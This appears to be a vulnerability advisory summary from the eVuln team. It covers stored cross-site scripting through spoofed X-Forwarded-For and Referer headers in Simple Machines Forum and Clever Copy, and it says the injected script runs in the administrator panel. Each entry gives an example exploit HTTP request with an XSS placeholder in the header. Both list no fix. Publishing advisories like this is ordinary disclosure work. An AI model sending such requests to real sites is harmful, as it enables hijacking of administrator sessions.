Recent X-Forwarded-For XSS vulnerabilities
Here is short summary of recent X-Forwarded-For XSS vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.
X-Forwarded-For XSS in Simple Machines Forum - SMF.
Description.
Vulnerable script: Sources/Register.php
Variable $_SERVER['HTTP_X_FORWARDED_FOR'] isn't properly sanitized. This can be used to post HTTP query with fake X-Forwarded-For value which may contain arbitrary html or script code. This code will be executed when administrator will open "View all members" section in Administrator's control panel .
Administrator's session is threatened.
Exploit.
Example of HTTP POST Query:
- POST /smf/index.php?PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0
- Host: [host]
- X-Forwarded-For: anyIP[XSS]
- Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944
- Content-Length: 81
- user=m&email=m@m.com&passwrd1=m&passwrd2=m®agree=1®Submit=Register
Solution
Solution is not available.
Other details >>Clever Copy Referer and X-Forwarded-For XSS.
Description.
Vulnerable script: stats/script.php
Variables $_SERVER['HTTP_REFERER'] $_SERVER['HTTP_X_FORWARDED_FOR'] are not properly sanitized. This can be used to post HTTP query with fake Referer or X-Forwarded-For values which may contain arbitrary html or script code. This code will be executed when administrator will open Site Stats.
Administrator's session is threatened.
Exploit.
Example of HTTP Query:
GET /path//stats/script.php?image=1&javascript=false HTTP/1.0
Host: host
Referer: http://path/index.php<XSS>
X-Forwarded-For: anyIP<XSS>
Solution
Solution is not available.
Other details >>